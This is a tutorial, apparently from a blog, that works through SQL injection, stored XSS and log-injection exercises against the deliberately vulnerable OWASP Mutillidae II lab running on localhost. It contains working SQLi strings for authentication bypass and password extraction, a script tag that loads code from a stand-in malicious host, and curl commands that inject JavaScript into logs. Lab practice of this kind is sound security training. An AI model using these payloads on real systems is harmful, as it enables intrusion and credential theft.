Learning web app secuiry with OWASP Mutillidae II - part 1

NOWASP (Mutillidae) is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest.

OWASP logo. Source: secplicity.org

OWASP logo. Source: secplicity.org


Run nowasp container:

docker run -p 8888:80 -p 3306:3306 citizenstig/nowasp

Go to http://localhost:8888/ , and build the DB.


OWASP 2013

A1 - Injection (SQL) - SQLi Extract data - User info

Submit the form with such query in the Name field:

admin'-- AND 'password='password'

Response should contain:

Signature=g0t r00t?

A1 - Injection (SQL) - SQLi Bypass authentication - Login

You can use the same query in the Name field:

admin'-- AND 'password='password'

After submitting the query you should see that you’re logged in as…:

Logged In Admin: admin (g0t r00t?)

A1 - Injection (SQL) - SQLi Insert Injection - Add to your blog

Stored Cross-Site Scripting

<script src="http://malicious.site.com/bad.js"></script>

Once saved, check your browser’s Network requests using e.g. Developer tools:

get MySQL version:


Red herrings: queries that don’t fail but don’t give much info back:

'+(SELECT IF(1=1,'true','false'))+'
'+(SELECT password FROM accounts WHERE username="root")+'
'+SUBSTRING((SELECT password FROM accounts WHERE username="root"),1,10)+'
'+(SELECT table_name FROM information_schema.tables WHERE table_schema = "nowasp.accounts")+'
'+(SELECT column_name FROM information_schema.columns WHERE table_schema = "nowasp.accounts")+'
'+SUBSTRING(SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = "nowasp.accounts",1,50)+'
'+SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name="accounts"),1,50)+'
aaa', now()); SELECT * FROM accounts; --
aaa', IF(1=1,'true','false'));#
aaa', IF(1=1, SELECT * FROM members, 'false'));#
'+ (SELECT password FROM accounts WHERE login='admin' ) +'
'+(SELECT password FROM members WHERE login="admin")+'
'+(SELECT IF(1=1,'true','false'))+'
admin'-- AND SELECT * FROM accounts;

A1 - Injection (SQL) - SQLi Insert Injection - Register for an Account

HTMLi - add this to the registration signature:


or you can use it to plant some XSS:


Then log in as newly created user and see that 1 is visible next to the user name in top menu:

A1 - Injection (SQL) - SQLi Insert Injection - View Captured Data

Here’s one of my favs: Application Log Injection:
You can send a dummy HTTP request with User-Agent header containing JS:

curl "http://localhost:8888/index.php?page=register.php" -H "User-Agent: <script>alert('pwnd with Application Log Injection');</script>"  &> /dev/null

or abuse the fact that the endpoint part of the URL is interpretted and logged so that we can include JS in it:

curl "http://localhost:8888/<script>alert('query_param');</script>" &> /dev/null

Once you send the request, then go to the http://localhost:8888/index.php?page=show-log.php the alert pop-ups will appear.


  • can you create an account for root user???
curl "http://localhost:8888/index.php?page=capture-data.php&showhints=1" -H "PHPSESSID: 5hdie94hhe7cc50pqsbvujqkb3"